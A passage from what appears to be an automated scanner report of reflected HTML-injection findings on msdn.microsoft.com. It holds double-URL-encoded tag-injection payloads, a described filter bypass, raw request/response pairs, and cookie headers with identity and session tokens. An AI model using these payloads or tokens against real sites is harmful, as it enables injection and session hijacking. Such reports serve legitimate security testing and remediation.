MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:13:39 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us61c4c"><a>ee87a223ebb/library/cc295789" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44a01%2522%253e%253ca%253ede0d876fda0 was submitted in the REST URL parameter 2. This input was echoed as 44a01"><a>de0d876fda0 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library44a01%2522%253e%253ca%253ede0d876fda0/cc295789.aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:13:49 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library44a01"><a>de0d876fda0/cc295789" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e327%2522%253e%253ca%253e398a6fe2bd2 was submitted in the REST URL parameter 3. This input was echoed as 9e327"><a>398a6fe2bd2 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/cc295789.aspx9e327%2522%253e%253ca%253e398a6fe2bd2 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9209
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:01 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/cc295789.aspx9e327"><a>398a6fe2bd2" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56fbf%2522%253e%253ca%253e18d7c0c0b34 was submitted in the REST URL parameter 1. This input was echoed as 56fbf"><a>18d7c0c0b34 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us56fbf%2522%253e%253ca%253e18d7c0c0b34/library/dd208104(PROT.10 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9215
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:15:48 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us56fbf"><a>18d7c0c0b34/library/dd208104(PROT.10" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a45d7%2522%253e%253ca%253e649622910d4 was submitted in the REST URL parameter 2. This input was echoed as a45d7"><a>649622910d4 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/librarya45d7%2522%253e%253ca%253e649622910d4/dd208104(PROT.10 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9216
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:15:58 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/librarya45d7"><a>649622910d4/dd208104(PROT.10" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 797d1%2522%253e%253ca%253e5235629b1dd was submitted in the REST URL parameter 3. This input was echoed as 797d1"><a>5235629b1dd in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/dd208104(PROT.10797d1%2522%253e%253ca%253e5235629b1dd HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9215
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:16:06 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/dd208104(PROT.10797d1"><a>5235629b1dd" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e862a%2522%253e%253ca%253e3fcd2f23dad was submitted in the REST URL parameter 1. This input was echoed as e862a"><a>3fcd2f23dad in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-use862a%2522%253e%253ca%253e3fcd2f23dad/library/dd208104(PROT.10).aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9217
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:21 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-use862a"><a>3fcd2f23dad/library/dd208104(PROT.10)" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 653a0%2522%253e%253ca%253eb3def3ef286 was submitted in the REST URL parameter 2. This input was echoed as 653a0"><a>b3def3ef286 in the application's response.
